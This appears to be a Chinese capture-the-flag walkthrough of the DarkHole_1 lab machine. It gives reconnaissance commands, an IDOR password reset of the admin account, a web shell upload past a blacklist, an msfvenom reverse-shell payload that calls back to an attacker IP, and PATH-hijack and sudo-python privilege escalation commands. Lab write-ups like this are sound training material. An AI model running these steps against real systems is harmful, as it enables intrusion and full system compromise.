每周打靶-DarkHole系列靶机实战

DarkHole_1

信息搜集

使用nmap进行存活IP检测
nmap -sP 192.168.23.0/24

发现目标靶机ip，扫描开放端口及其服务
nmap -sV 192.168.23.167

发现开放80（http）、22（ssh）端口，进行目录遍历、指纹搜集
dirsearch.py -u [http://192.168.23.167](http://192.168.23.167)

whatweb -v 192.168.23.167

暂时没有发现很醒目的特征，使用浏览器进行登陆。

开始渗透

发现页面上只有一个登陆页面可以进入

抓包后发现，暴力破解用户名密码不太现实

发现可以注册用户，注册一个新用户，并使用这个用户进行登陆，可以看到用户名，密码邮箱并没有进行正则过滤。


看到这里可以更改用户密码，更改密码并抓包

看到有参数 id=2，怀疑有越权漏洞，开始尝试，id=2是我刚开始创建的普通用户，那么id=1就有可能是高权限用户，修改参数并尝试登陆，

123456，就是为id=1的用户修改的新密码，然后退出本页面，再重新使用密码123456登陆，这时我们已经确定了密码是正确的，可以使用BP的intruder模块进行暴力破解，也可以尝试常用管理员用户名进行尝试登陆

我使用用户名 admin密码123456登陆，成功登陆管理员页面，发现可以上传文件
上传简单木马

发现做了黑名单过滤，

抓包进行文件后缀名修改，发包

上传成功，并回显上传路径，使用蚁剑进行链接,获取到shell

3.反弹shell

使用kali生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.150 lpor=4444 -o msfshell.php

打开kali的ftp服务，操作靶机shell进行下载

使用美少妇（msf）监听模块，并设置参数，和攻击载荷

运行，并访问刚才靶机下载到upload文件夹下的反弹shell

kali获取到，输入 shell,并输入python3 -c 'import pty;pty.spawn("/bin/bash")'获取交互式shell

4.提权

可以看到目前权限太低，先查看cat /etc/passwd | grep /bin/bash,敏感文件，发现可以尝试提权到的用户

到 home目录下查找john文件夹，发现toto文件有suid权限，执行发现是命令 id 的功能

我们可以利用这个功能，我们可以编写一个新的id命令，给执行权限，然后导入环境变量，让其执行id命令功能时可以引用我们的代码，从而获取到john的shell

运行 toto文件，提权到 john 权限

获取john 的用户密码

查看这个用户下有没有可以执行的特权命令
sudo -l

发现对 file.py 文件有读写权限，然后写入shell，然后再去执行脚本，就成功获取root权限
echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py

然后到 root 目录下查看文件，发现root.txt， cat一下

flag到手，渗透结束（good game）！！！